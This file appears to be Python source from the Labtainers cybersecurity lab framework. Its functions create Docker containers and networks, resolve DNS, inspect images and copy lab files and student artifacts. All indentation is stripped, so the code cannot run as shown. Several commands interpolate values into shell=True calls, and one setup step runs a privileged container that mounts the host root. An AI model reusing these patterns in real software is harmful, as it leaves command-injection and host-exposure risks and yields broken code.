def GetContainerCloneNames(container):
''' populate dictionary with hostname/container names based on the quantity of clones
that are to be created '''
retval = {}
if container.clone_copies is None or container.clone == 1:
retval[container.full_name] = container.hostname
else:
try:
count = int(container.clone_copies)
except:
logger.error('bad clone value for %s' % container.hostname)
exit(1)
name, role = container.full_name.rsplit('.', 1)
for i in range(1, count+1):
hostname = '%s-%d' % (container.hostname, i)
fullname = '%s-%d.%s' % (name, i, role)
retval[fullname] = hostname
return retval
def GetDNS_NMCLI():
dns_param = ''
dns_param = '--dns=8.8.8.8'
cmd="nmcli dev show | grep 'IP4.DNS'"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0]) > 0:
for line in output[0].decode('utf-8').splitlines(True):
dns_param = '--dns=%s %s' % (line.split()[1].strip(), dns_param)
''' just take first '''
break
return dns_param
def GetDNS():
dns_param = ''
dns_param = '--dns=8.8.8.8'
labtainer_dns = os.getenv('LABTAINER_DNS')
if labtainer_dns is not None and len(labtainer_dns)>0:
dns_param = '--dns=%s %s' % (labtainer_dns.strip(), dns_param)
else:
cmd="systemd-resolve --status | grep 'DNS Servers:'"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0]) > 0:
for line in output[0].decode('utf-8').splitlines(True):
dns_param = '--dns=%s %s' % (line.split()[2].strip(), dns_param)
''' just take first '''
break
else:
dns_param = GetDNS_NMCLI()
return dns_param
def GetX11SSH():
''' EXPERIMENTAL, not used '''
ip = '192.168.1.222'
xauth = '/tmp/.docker.xauth'
#display = os.getenv('DISPLAY')
display = ':10'
cmd = 'xauth list %s' % display
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0]) > 0:
parts = output[0].decode('utf-8').strip().split()
magic_cookie = parts[2]
else:
print('could not find magic cookie')
exit(1)
x11_port = display.split(':')[1]
#print('x11_port %s' % x11_port)
cmd = 'xauth -f /tmp/.docker.xauth add %s:%s . %s' % (ip, x11_port, magic_cookie)
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
os.chmod(xauth, 0o777)
retval = '--env="%s:%s" -v %s:%s -e XAUTHORITY="%s"' % (ip, x11_port, xauth, xauth, xauth)
#retval = '--env="DISPLAY" -v %s:%s -e XAUTHORITY="%s"' % (xauth, xauth, xauth)
return retval
def isUbuntuSystemd(image_name):
''' NOTE side effect of update networkImages global '''
done = False
retval = None
#print('check if %s is systemd' % image_name)
cmd = "docker inspect -f '{{json .Config.Labels.base}}' --type image %s" % image_name
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0].strip()) > 0:
#logger.debug('isUbuntuSystemd base %s' % output[0].decode('utf-8'))
if output[0].decode('utf-8').strip() == 'null':
base = image_name
else:
base = output[0].decode('utf-8').rsplit('.', 1)[0]
if base.startswith('"'):
base = base[1:]
if '/' in base and '/' in image_name:
my_registry = image_name.split('/')[0]
no_reg = base.split('/')[1]
base = '%s/%s' % (my_registry, no_reg)
cmd = "docker history --no-trunc %s" % base
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
for line in output[0].decode('utf-8').splitlines():
if 'sshd' in line or 'xinetd' in line:
net_image = image_name
if '/' in image_name:
net_image = image_name.split('/')[1]
if net_image not in networkImages:
networkImages.append(net_image)
if 'Labtainer base image from ubuntu-systemd' in line:
retval = 'ubuntu16'
if 'ubuntu20' in line:
retval = 'ubuntu20'
break
return retval
def isFirefox(image_name):
done = False
retval = False
#print('check if %s is systemd' % image_name)
cmd = "docker inspect -f '{{json .Config.Labels.base}}' --type image %s" % image_name
#print('lab container cmd is %s' % cmd)
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0].strip()) > 0:
logger.debug('base %s' % output[0].decode('utf-8'))
if output[0].decode('utf-8').strip() == 'null':
base = image_name
else:
base = output[0].decode('utf-8').rsplit('.', 1)[0]+'"'
cmd = "docker history --no-trunc %s" % base
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
for line in output[0].decode('utf-8').splitlines():
if 'firefox' in line:
retval = True
break
return retval
def FindTapMonitor(start_config):
for container_name in start_config.containers:
#logger.debug('FindTapMonitor check %s' % container_name)
for subnet in start_config.containers[container_name].container_nets:
#logger.debug('FindTapMonitor check lan %s' % subnet)
if subnet.lower() == 'tap_lan':
ip = start_config.containers[container_name].container_nets[subnet]
return container_name, ip
return None, None
def HandleVolumes(volume, container):
for m in container.mounts:
logger.debug('adding volume mount %s' % m)
''' host volume is relative to ~/.local/share/labtainers, container relative to Home unless absolute '''
try:
hostv, containerv = m.split(':')
except:
self.lgr.error('Bad mount definition %s' % m)
exit(1)
homedir = os.environ['HOME']
host_path = os.path.join(homedir, '.local', 'share', 'labtainers', hostv)
if not os.path.isfile(host_path):
try:
os.mkdir(host_path)
except:
pass
container_path = os.path.join('/home', container.user, containerv)
volume = volume + ' -v %s:%s:rw' % (host_path, container_path)
return volume
def CreateSingleContainer(labtainer_config, start_config, container, mysubnet_name=None, mysubnet_ip=None, quiet=False):
''' create a single container -- or all clones of that container per the start.config '''
retval = True
#image_exists, result, new_image_name = ImageExists(container.image_name, container.registry)
if container.registry == labtainer_config.test_registry:
branch, container_registry = registry.getBranchRegistry()
base_registry = container_registry
else:
container_registry = container.registry
base_registry = container.base_registry
logger.debug("Create Single Container for %s using registry %s" % (container.name, container_registry))
image_info = imageInfo(container.image_name, container_registry, base_registry, labtainer_config, quiet=quiet)
if image_info is None:
logger.error('Could not find image for %s' % container.image_name)
retval = False
else:
new_image_name = container.image_name
if not image_info.local_build:
new_image_name = '%s/%s' % (container_registry, container.image_name)
if not image_info.local:
dockerPull(container_registry, container.image_name)
docker0_IPAddr = getDocker0IPAddr()
logger.debug("getDockerIPAddr result (%s)" % docker0_IPAddr)
volume=''
ubuntu_systemd = isUbuntuSystemd(new_image_name)
if ubuntu_systemd is not None:
osTypeMap[container.image_name] = ubuntu_systemd
is_firefox = isFirefox(new_image_name)
if is_firefox:
shm = '--shm-size=2g'
else:
shm = ''
if container.script == '' or ubuntu_systemd is not None:
logger.debug('Container %s is systemd or has script empty <%s>' % (new_image_name, container.script))
''' a systemd container, centos or ubuntu? '''
if ubuntu_systemd == 'ubuntu16':
''' A one-off run to set some internal values. This is NOT what runs the lab container '''
#volume='--security-opt seccomp=confined --tmpfs /run --tmpfs /run/lock -v /sys/fs/cgroup:/sys/fs/cgroup:ro'
volume='--security-opt seccomp=unconfined --tmpfs /run --tmpfs /run/lock -v /sys/fs/cgroup:/sys/fs/cgroup:ro'
cmd = 'docker run --rm --privileged -v /:/host %s setup' % new_image_name
logger.debug('cmd is %s' % cmd)
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
logger.debug('back from docker run, output %s' % (output[0].decode('utf-8')))
if len(output[1]) > 0:
logger.debug('back from docker run, error %s' % (output[1].decode('utf-8')))
volume = ''
elif ubuntu_systemd == 'ubuntu20':
volume = volume + " -v /sys/fs/cgroup:/sys/fs/cgroup:ro "
if container.x11.lower() == 'yes':
#volume = '-e DISPLAY -v /tmp/.Xll-unix:/tmp/.X11-unix --net=host -v$HOME/.Xauthority:/home/developer/.Xauthority'
#volume = volume+' --env="DISPLAY" --volume="/tmp/.X11-unix:/tmp/.X11-unix:rw"'
volume = volume+' --env="DISPLAY" --volume="/tmp/.X11-unix:/var/tmp/.X11-unix:rw"'
logger.debug('container using X11')
volume = HandleVolumes(volume, container)
if container.mystuff.lower() == 'yes':
here = os.getcwd()
mystuff_dir = os.path.join(here, 'mystuff')
myv = ' --volume="%s:/home/%s/mystuff:rw"' % (mystuff_dir, container.user)
volume = volume+myv
mystuff_dir = os.path.join(os.environ['LABTAINER_DIR'], 'scripts', 'labtainer-student','mystuff')
try:
os.mkdir(mystuff_dir)
except:
pass
#if container.thumb_volume is not None:
# volume = volume+' --volume="/dev:/dev:rw"'
# #volume = volume+' --device="/dev/sdb"'
add_hosts = ''
for item in container.add_hosts:
if ':' not in item:
if item in start_config.lan_hosts:
for entry in start_config.lan_hosts[item]:
if not entry.startswith(container.name):
add_this = '--add-host %s ' % entry
add_hosts += add_this
else:
logger.error('ADD-HOST entry in start.config missing colon: %s' % item)
logger.error('sytax: ADD-HOST <host>:<ip>')
return
else:
add_this = '--add-host %s ' % item
add_hosts += add_this
if docker0_IPAddr is not None:
add_host_param = '--add-host my_host:%s %s' % (docker0_IPAddr, add_hosts)
else:
add_host_param = add_hosts
if container.tap == 'yes':
''' docker fu when using host networking, sudo hangs looking for host ip? '''
add_host_param = '--add-host %s:127.0.0.1 %s' % (container.hostname, add_host_param)
monitor_tap, ip = FindTapMonitor(start_config)
if monitor_tap is not None:
add_host_param = '--add-host monitor_tap:%s %s' % (ip, add_host_param)
wait_tap_dir = GetWaitTapDir()
volume = '%s --volume %s:/tmp/wait_tap_dir' % (volume, wait_tap_dir)
dns_param = GetDNS()
priv_param = ''
if container.no_privilege != 'yes':
priv_param = '--privileged'
publish_param = ''
if container.publish is not None:
publish_param = '--publish %s' % container.publish
mac = ''
subnet_ip = ''
network_param = ''
if container.tap == 'yes':
network_param = '--network=host'
elif mysubnet_name is not None:
network_param = '--network=%s' % mysubnet_name
multi_user = ''
if container.client == 'yes' and start_config.multi_user is not None:
#print('use putenv to set %s' % start_config.multi_user)
os.putenv("DISTRIBUTED_LABTAINER", start_config.multi_user)
''' why does putenv not set the value? '''
os.environ['DISTRIBUTED_LABTAINER'] = start_config.multi_user
multi_user = '--env=DISTRIBUTED_LABTAINER'
clone_names = GetContainerCloneNames(container)
for clone_fullname in clone_names:
clone_host = clone_names[clone_fullname]
if mysubnet_name is not None:
subnet_ip, mac = GetNetParam(start_config, mysubnet_name, mysubnet_ip, clone_fullname)
#createsinglecommand = "docker create -t %s --ipc host --cap-add NET_ADMIN %s %s %s %s %s --name=%s --hostname %s %s %s %s %s" % (dns_param,
if len(container.docker_args) == 0:
createsinglecommand = "docker create %s -t %s --cap-add NET_ADMIN %s %s %s %s %s %s --name=%s --hostname %s %s %s %s" % \
(shm, dns_param, network_param, subnet_ip, mac, priv_param, add_host_param,
publish_param, clone_fullname, clone_host, volume,
multi_user, new_image_name)
else:
createsinglecommand = "docker create %s %s --shm-size=2g -t %s --cap-add NET_ADMIN %s %s %s %s %s %s --name=%s --hostname %s %s %s %s" % \
(shm, container.docker_args, dns_param, network_param, subnet_ip, mac, priv_param, add_host_param,
publish_param, clone_fullname, clone_host, volume,
multi_user, new_image_name)
logger.debug("Command to execute was (%s)" % createsinglecommand)
ps = subprocess.Popen(shlex.split(createsinglecommand), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1]) > 0:
logger.debug('command was %s' % createsinglecommand)
if 'Cannot connect to the Docker daemon' in output[1].decode('utf-8'):
print('\n\nERROR: Docker seems not to be running.')
print('Try "sudo systemctl restart docker"\n\n')
logger.error('CreateSingleContainer %s' % output[1].decode('utf-8'))
retval = False
break
#print('result of create %s' % output[0])
return retval
def GetIface(ip):
cmd = 'ifconfig | grep -B1 "inet addr:%s" | awk \'$1!="inet" && $1!="--" {print $1}\'' % ip
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
return output[0].decode('utf-8').strip()
def CheckPromisc(iface):
cmd = "netstat -i | grep enp0s8 | awk '{print $12}'"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if 'P' in output[0].decode('utf-8'):
return True
else:
return False
# Create SUBNETS
def CreateSubnets(start_config):
has_tap = False
subnets = start_config.subnets
#for (subnet_name, subnet_network_mask) in networklist.iteritems():
for subnet_name in subnets:
subnet_network_mask = subnets[subnet_name].mask
logger.debug("subnet_name is %s" % subnet_name)
logger.debug("subnet_network_mask is %s" % subnet_network_mask)
if subnets[subnet_name].tap:
has_tap = True
command = "docker network inspect %s" % subnet_name
logger.debug("Command to execute is (%s)" % command)
inspect_result = subprocess.call(shlex.split(command), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
logger.debug("Result of subprocess.call CreateSubnets docker network inspect is %s" % inspect_result)
if inspect_result == FAILURE:
# Fail means does not exist - then we can create
macvlan = ''
ip_range = ''
net_type = 'bridge'
if subnets[subnet_name].macvlan_use is not None:
#iface = GetIface(subnets[subnet_name].macvlan)
iface = subnets[subnet_name].macvlan_use
if iface is None or len(iface) == 0:
logger.error("No IP assigned to network %s, assign an ip on Linux host to enable use of macvlan with Labtainers")
exit(1)
if not CheckPromisc(iface):
logger.warning("network %s not in promisc mode, required for macvlan inter-vbox comms\nUse: sudo ifconfig %s promisc" % (iface, iface))
macvlan = '-o parent=%s -o macvlan_mod=bridge' % iface
net_type = 'macvlan'
if subnets[subnet_name].ip_range is not None:
ip_range = '--ip-range %s' % subnets[subnet_name].ip_range
if subnets[subnet_name].gateway != None:
logger.debug(subnets[subnet_name].gateway)
subnet_gateway = subnets[subnet_name].gateway
command = "docker network create -d %s --gateway=%s --subnet %s %s %s %s" % (net_type, subnet_gateway, subnet_network_mask, macvlan, ip_range, subnet_name)
else:
command = "docker network create -d %s --subnet %s %s %s %s" % (net_type, subnet_network_mask, macvlan, ip_range, subnet_name)
logger.debug("Command to execute is (%s)" % command)
#create_result = subprocess.call(command, shell=True)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
logger.debug("stdout of subprocess.call CreateSubnets docker network create is %s" % output[0].decode('utf-8'))
if len(output[1]) > 0:
logger.debug('stderr of %s is %s' % (command, output[1].decode('utf-8')))
found_match_network = False
found_match_network_name = ""
# Before a hard exit - give the user some indication of what to do next
# First check to see if a gateway is provided and it is already used
if 'no matching subnet' in output[1].decode('utf-8'):
logger.error('Config error: %s' % output[1].decode('utf-8'))
exit(1)
if subnets[subnet_name].gateway != None:
found_match_network, found_match_network_name = FindNetworkGivenGatewayIP(subnets[subnet_name].gateway)
# If Gateway IP address not okay, no need to check subnet anymore
if not found_match_network:
# Gateway IP address might be okay but subnet mask might not
found_match_network, found_match_network_name = FindNetworkGivenSubnet(subnet_network_mask)
else:
# No Gateway IP address, check the subnet mask only
found_match_network, found_match_network_name = FindNetworkGivenSubnet(subnet_network_mask)
# At this point, if still not found then just print error and exit
if not found_match_network:
logger.error("Failed to create %s subnet at %s, %s\n" % (subnet_name, subnet_network_mask, output[1].decode('utf-8')))
logger.error("command was %s\n" % command)
sys.exit(1)
else:
# Found either a network matching the Gateway IP address or matching subnet
lablist = []
# See if any lab is using that network
lablist = GetListLabContainerOnNetwork(found_match_network_name)
if lablist == []:
# No lab is using the network - tell user to remove that "left-over" network
logger.error("An existing Docker network is preventing this lab from starting.")
logger.error("Try removing the network with:")
logger.error("docker network rm %s" % found_match_network_name)
sys.exit(1)
else:
# There is lab using that network - tell user to stop that lab first
logger.error("An existing Docker network is preventing this lab from starting.")
logger.error("This may be due to a failure to stop a previous lab.")
logger.error("Please stop the lab %s and try again." % lablist)
sys.exit(1)
else:
logger.warning("Already exists! Not creating %s subnet at %s!\n" % (subnet_name, subnet_network_mask))
return has_tap
def RemoveSubnets(subnets, ignore_stop_error):
for subnet_name in subnets:
command = "docker network rm %s" % subnet_name
logger.debug('command %s' % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].decode('utf-8')) > 0:
if ignore_stop_error:
logger.debug('Encountered error removing subnet %s' % subnet_name)
else:
logger.error('Encountered error removing subnet %s' % subnet_name)
EMAIL_TMP='./.tmp/email.txt'
def getHomeEmail():
''' compatability for move of email to ~/.local/share/labtainers '''
homedir = os.environ['HOME']
lab_app = os.path.join(homedir,'.local', 'share', 'labtainers')
logger.debug('getHomeEmail lab_app %s' % lab_app)
try:
os.makedirs(lab_app)
except:
pass
email_path = os.path.join(lab_app, 'email.txt')
if not os.path.isfile(email_path):
logger.debug('getHomeEmail no email at %s' % email_path)
if os.path.isfile(EMAIL_TMP):
logger.debug('getHomeEmail copy from %s' % EMAIL_TMP)
shutil.copy(EMAIL_TMP, lab_app)
else:
if 'LABTAINER_DIR' in os.environ:
student_email = os.path.join(os.environ['LABTAINER_DIR'], 'scripts', 'labtainer-student','.tmp', 'email.txt')
if os.path.isfile(student_email):
shutil.copy(student_email, lab_app)
else:
logger.debug('No email found at %s' % student_email)
else:
logger.debug('LABTAINER_DIR not in env, no email path found')
return email_path
def getLastEmail():
retval = None
home_email = getHomeEmail()
if os.path.isfile(home_email):
with open(home_email) as fh:
retval = fh.read()
if retval is not None:
retval = retval.strip()
return retval
def putLastEmail(email):
home_email = getHomeEmail()
with open(home_email, 'w') as fh:
fh.write(email)
def GetLabSeed(lab_master_seed, student_email):
# Create hash using LAB_MASTER_SEED concatenated with user's e-mail
# LAB_MASTER_SEED is per laboratory - specified in start.config
string_to_be_hashed = '%s:%s' % (lab_master_seed, student_email)
mymd5 = hashlib.new('md5')
mymd5.update(string_to_be_hashed.encode('utf-8'))
mymd5_hex_string = mymd5.hexdigest()
return mymd5_hex_string
#def ParamStartConfig(lab_seed):
def ParamForStudent(lab_master_seed, mycontainer_name, mycontainer_image_name, container_user, container_password, labname,
student_email, lab_path, name, image_info, running_container=None):
# NOTE image_info may or may not be populated.
if running_container == None:
running_container = mycontainer_name
mymd5_hex_string = GetLabSeed(lab_master_seed, student_email)
logger.debug(mymd5_hex_string)
if not ParameterizeMyContainer(mycontainer_name, mycontainer_image_name, container_user, container_password, mymd5_hex_string,
student_email, labname, lab_path, name, image_info, running_container):
logger.error("Failed to parameterize lab container %s!\n" % mycontainer_name)
sys.exit(1)
logger.debug('back from ParameterizeMyContainer for %s' % mycontainer_name)
def DockerCmd(cmd, noloop=False):
ok = False
count = 0
if noloop:
count = 1000
while not ok:
logger.debug("Command to execute is (%s)" % cmd)
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].decode('utf-8')) > 0:
count += 1
logger.debug("Failed cmd %s %s" % (cmd, output[1].decode('utf-8')))
if count > 1:
return False
time.sleep(1)
else:
ok = True
if len(output[0].decode('utf-8')) > 0:
logger.debug("cmd %s stdout: %s" % (cmd, output[0].decode('utf-8')))
out = output[0].decode('utf-8')
if 'unrecognized option' in out or 'Unexpected EOF' in out:
return False
return True
def CopyInstrConfig(mycontainer_name, container_user, lab_path):
cmd = 'docker cp %s/instr_config/. %s:/home/%s/.local/instr_config/' % (lab_path, mycontainer_name, container_user)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
cmd = 'docker cp %s/config/. %s:/home/%s/.local/config/' % (lab_path, mycontainer_name, container_user)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
def CopyLabBin(mycontainer_name, mycontainer_image_name, container_user, lab_path, name, image_info):
here = os.path.dirname(os.path.abspath(__file__))
parent = os.path.dirname(here)
lab_bin_path = os.path.join(parent, 'lab_bin')
cmd = 'docker cp %s/. %s:/home/%s/.local/bin/' % (lab_bin_path, mycontainer_name, container_user)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
''' TBD DO NOT move lab/config here -- would not catch the tar_list.txt files (skip list) '''
''' TBD perhaps move lab/_bin to here? would it save duplicate containers?'''
#container_bin = os.path.join(lab_path, name,'_bin')
#if os.path.isdir(container_bin):
# cmd = 'docker cp %s/. %s:/home/%s/.local/bin/' % (container_bin, mycontainer_name, container_user)
# DockerCmd(cmd)
tmp_dir=os.path.join('/tmp/labtainers', mycontainer_name)
shutil.rmtree(tmp_dir, ignore_errors=True)
try:
os.makedirs(tmp_dir)
except os.error:
logger.error("did not expect to find dir %s" % tmp_dir)
capinout = os.path.join(parent, 'lab_sys', 'usr','sbin', 'capinout')
if not os.path.isfile(capinout):
print('\n\n********* ERROR ***********')
print('%s is missing. If this is a development system, you may need to' % capinout)
print('go to the tool-src/capinout directory and run ./mkit.sh')
''' Copy file to /lib and /sys. Account for sym link fu '''
dest_tar = os.path.join(tmp_dir, 'labsys.tar')
lab_sys_path = os.path.join(parent, 'lab_sys')
cmd = 'tar cf %s -C %s usr etc' % (dest_tar, lab_sys_path)
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('tar failure %s result: %s' % (cmd, output[1].decode('utf-8')))
cmd = 'docker cp %s %s:/var/tmp/' % (dest_tar, mycontainer_name)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
cmd = 'docker exec %s script -q -c "sudo tar -x --keep-directory-symlink -f /var/tmp/labsys.tar -C /"' % (mycontainer_name)
#if mycontainer_image_name in osTypeMap and osTypeMap[mycontainer_image_name] == 'ubuntu18':
# cmd = 'docker exec %s script -q -c "sudo tar -x --keep-directory-symlink -f /var/tmp/labsys.tar -C /"' % (mycontainer_name)
#else:
# cmd = 'docker exec %s script -q -c "sudo tar -x --keep-directory-symlink -f /var/tmp/labsys.tar -C /usr/"' % (mycontainer_name)
if not DockerCmd(cmd):
cmd = 'docker cp lab_sys/. %s:/' % (mycontainer_name)
#if osTypeMap[mycontainer_image_name] == 'ubuntu18':
# cmd = 'docker cp lab_sys/. %s:/' % (mycontainer_name)
#else:
# cmd = 'docker cp lab_sys/. %s:/usr/' % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
logger.debug('CopyLabBin tar failed for lab_sys, explicit copy')
if mycontainer_image_name in osTypeMap and osTypeMap[mycontainer_image_name] == 'ubuntu20':
cmd = 'docker exec %s script -q -c "sed -i \'s/env python/env python3/\' /usr/sbin/mynotify.py"' % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('failed changing mynotify to python3: %s' % cmd)
exit(1)
# Copy Students' Artifacts from host to instructor's lab container
def CopyStudentArtifacts(labtainer_config, mycontainer_name, labname, container_user, container_password):
# Set the lab name
command = 'docker exec %s script -q -c "echo %s > /home/%s/.local/.labname" /dev/null' % (mycontainer_name, labname, container_user)
logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(command, shell=True)
logger.debug("Result of subprocess.call CopyStudentArtifacts set labname is %s (1=>FAILURE)" % result)
if result == FAILURE:
logger.error("Failed to set labname in container %s!\n" % mycontainer_name)
sys.exit(1)
# Create is_grade_container
command = 'docker exec %s script -q -c "echo TRUE > /home/%s/.local/.is_grade_container" /dev/null' % (mycontainer_name, container_user)
logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(command, shell=True)
logger.debug("Result of subprocess.call CopyStudentArtifacts create is_grade_container is %s (1=>FAILURE)" % result)
if result == FAILURE:
logger.error("Failed to create is_grade_container in container %s!\n" % mycontainer_name)
sys.exit(1)
username = getpass.getuser()
xfer_dir = os.path.join(labtainer_config.host_home_xfer, labname)
zip_filelist = glob.glob('/home/%s/%s/*.zip' % (username, xfer_dir))
logger.debug("filenames is (%s)" % zip_filelist)
# Copy zip files from 'Shared' folder to 'home/$CONTAINER_USER'
for fname in zip_filelist:
logger.debug("name is %s" % fname)
base_fname = os.path.basename(fname)
# Copy zip file
command = 'docker cp %s %s:/home/%s/' % (fname, mycontainer_name, container_user)
logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(shlex.split(command))
logger.debug("Result of subprocess.call CopyStudentArtifacts copy zipfile (%s) is %s (1=>FAILURE)" % (fname, result))
if result == FAILURE:
logger.error("Failed to copy student artifacts into container %s!\n" % mycontainer_name)
sys.exit(1)
#command = 'docker exec %s echo "%s\n" | sudo -S chown %s:%s /home/%s/%s' % (mycontainer_name, container_password,
# container_user, container_user, container_user, base_fname)
#command = 'docker exec %s chown %s:%s /home/%s/%s' % (mycontainer_name,
# container_user, container_user, container_user, base_fname)
#logger.debug("Command to execute is (%s)" % command)
#result = subprocess.call(command, shell=True)
#logger.debug("Result of subprocess.call CopyStudentArtifacts copy zipfile (%s) is %s" % (fname, result))
#if result == FAILURE:
# logger.error("Failed to set labname in container %s!\n" % mycontainer_name)
# sys.exit(1)
def GetRunningContainersList():
cmd = "docker container ls --format {{.Names}}"
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].decode('utf-8').strip()) > 0:
logger.debug('No running containers: error returned %s, return false' % output[1].decode('utf-8'))
return False, None
result = output[0].decode('utf-8').strip()
logger.debug('result is %s' % result)
if 'Error:' in result or len(result.strip()) == 0:
if 'Error:' in result:
logger.debug("Command was (%s)" % cmd)
logger.debug("Error from command = '%s'" % result)
return False, result
containers_list = result.split('\n')
return True, containers_list
def GetRunningLabNames(containers_list):
labnameslist = []
found_lab_role = False
for each_container in containers_list:
#print each_container
if each_container.endswith('.student'):
splitstring = each_container.split('.')
labname = splitstring[0]
found_lab_role = True
if labname not in labnameslist:
labnameslist.append(labname)
return found_lab_role, labnameslist
class ImageInfo():
def __init__(self, name, creation, user, local, local_build, version, use_tag):
self.name = name
self.creation = creation
self.user = user
self.local = local
''' whether a locally built image '''
self.local_build = local_build
self.version = None
self.use_tag = use_tag
if version is not None:
version = version.replace('"', '')
if version != 'null' and len(version.strip()) > 0:
try:
self.version = version
except:
logger.error('failed getting version from string <%s>' % version)
traceback.print_exc()
traceback.print_stack()
exit(1)
def inspectImage(image_name):
created = None
user = None
version = None
cmd = "docker inspect -f '{{.Created}}' --type image %s" % image_name
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0].decode('utf-8').strip()) > 0:
created = output[0].decode('utf-8').strip()
cmd = "docker inspect -f '{{.Config.User}}' --type image %s" % image_name
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0].decode('utf-8').strip()) > 0:
user = output[0].decode('utf-8').strip()
cmd = "docker inspect --format='{{json .Config.Labels.version}}' --type image %s" % image_name
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0].decode('utf-8').strip()) > 0:
version = output[0].decode('utf-8').strip()
return created, user, version
def imageInfo(image_name, registry, base_registry, labtainer_config, is_rebuild=False, no_pull=False, quiet=False, local_build=False):
''' image_name lacks registry info (always)
First look if plain image name exists, suggesting
an ongoing build/test situation '''
retval = None
use_tag = 'latest'
created, user, version = inspectImage(image_name)
if created is not None:
retval = ImageInfo(image_name, created, user, True, True, version, use_tag)
logger.debug('%s local built, ts %s %s' % (image_name, created, user))
else:
''' next see if there is a local image from the desired registry '''
with_registry = '%s/%s' % (registry, image_name)
created, user, version = inspectImage(with_registry)
if created is not None:
retval = ImageInfo(with_registry, created, user, True, False, version, use_tag)
logger.debug('%s local from reg, ts %s %s version: %s' % (with_registry, created, user, version))
elif not local_build:
''' See if the image exists in the desired registry '''
reg_host = None
if ':' in labtainer_config.test_registry:
reg_host = labtainer_config.test_registry.split(':')[0]
logger.debug('imageInfo reg_host: %s registry: %s' % (reg_host, registry))
if reg_host is not None and registry.startswith(reg_host):
created, user, version, use_tag, base = InspectLocalReg.inspectLocal(image_name, logger,
registry, is_rebuild=is_rebuild, quiet=quiet, no_pull=no_pull)
else:
created, user, version, use_tag = InspectRemoteReg.inspectRemote(with_registry, logger,
is_rebuild=is_rebuild, quiet=quiet, no_pull=no_pull, base_registry=base_registry)
if created is None and not is_rebuild:
if not InspectRemoteReg.reachDockerHub():
logger.error('Unable to reach DockerHub. \nIs the network functional?\n')
if created is not None:
logger.debug('%s only on registry %s, ts %s %s version %s use_tag %s' % (with_registry, registry, created, user, version, use_tag))
retval = ImageInfo(with_registry, created, user, False, False, version, use_tag)
if retval is None:
logger.debug('%s not found local_build was %r' % (image_name, local_build))
return retval
def GetBothConfigs(lab_path, logger, servers=None, clone_count=None):
labtainer_config_dir = os.path.join(os.path.dirname(os.path.dirname(lab_path)), 'config', 'labtainer.config')
labtainer_config = ParseLabtainerConfig.ParseLabtainerConfig(labtainer_config_dir, logger)
labname = os.path.basename(lab_path)
config_path = os.path.join(lab_path,"config")
start_config_path = os.path.join(config_path,"start.config")
start_config = ParseStartConfig.ParseStartConfig(start_config_path, labname,
labtainer_config, logger, servers=servers, clone_count=clone_count)
return labtainer_config, start_config
def dockerPull(registry, image_name):
cmd = 'docker pull %s/%s' % (registry, image_name)
logger.debug('%s' % cmd)
print('pulling %s from %s' % (image_name, registry))
ps = subprocess.Popen(shlex.split(cmd), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
output = ps.communicate()
if len(output[1]) > 0:
return False
print('Done with pull')
return True
def defineAdditionalIP(container_name, post_start_if, post_start_nets):
for subnet in post_start_nets:
existing_ip = post_start_if[subnet]
cmd = "docker exec %s bash -c 'ifconfig'" % (container_name)
logger.debug('cmd is %s' % cmd)
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
logger.debug('out0 %s \nout1 %s' % (output[0].decode('utf-8'), output[1].decode('utf-8')))
current_if = None
this_if = None
for line in output[0].decode('utf-8').splitlines():
parts = line.split()
if len(parts) < 2:
continue
if parts[1] == 'Link':
current_if = parts[0]
